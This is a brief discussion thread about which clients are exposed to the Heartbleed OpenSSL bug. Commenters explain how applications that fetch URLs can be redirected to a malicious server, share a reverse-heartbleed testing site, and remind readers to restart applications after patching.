

What clients are proven to be vulnerable to Heartbleed? - Angostura
http://security.stackexchange.com/questions/55249/what-clients-are-proven-to-be-vulnerable-to-heartbleed

======
patio11
This is _particularly_ of interest to those of us who e.g. have a web
application with an embedded HTTP client for e.g. processing web hooks,
hitting APIs, downloading image files for avatars, etc. If your application
can be coerced into fetching either a) an attacker-chosen URL or b) _any_ HTTP
URL, you can be sent to a malicious server which heartbleeds you. (If the
attacker can specify the URL it's trivial, if you get any HTTP URL then the
attacker can use a privileged vantage point to MITM the HTTP connection then
301 redirect you to a better URL.) Can you imagine any freed memory in your
appserver's process which you wouldn't want an attacker to have? Good answer!

------
bradleybuda
We _just_ pushed out a tester (we wanted it for ourselves and decided to make
it available to others):
[https://reverseheartbleed.com/](https://reverseheartbleed.com/)

Thanks to @patio11 and others for point out the 'other half' of this
vulnerability and motivating us to get a quick fix out.

------
beachstartup
yes, don't forget to restart your applications after updating openssl
libraries. this includes clients!

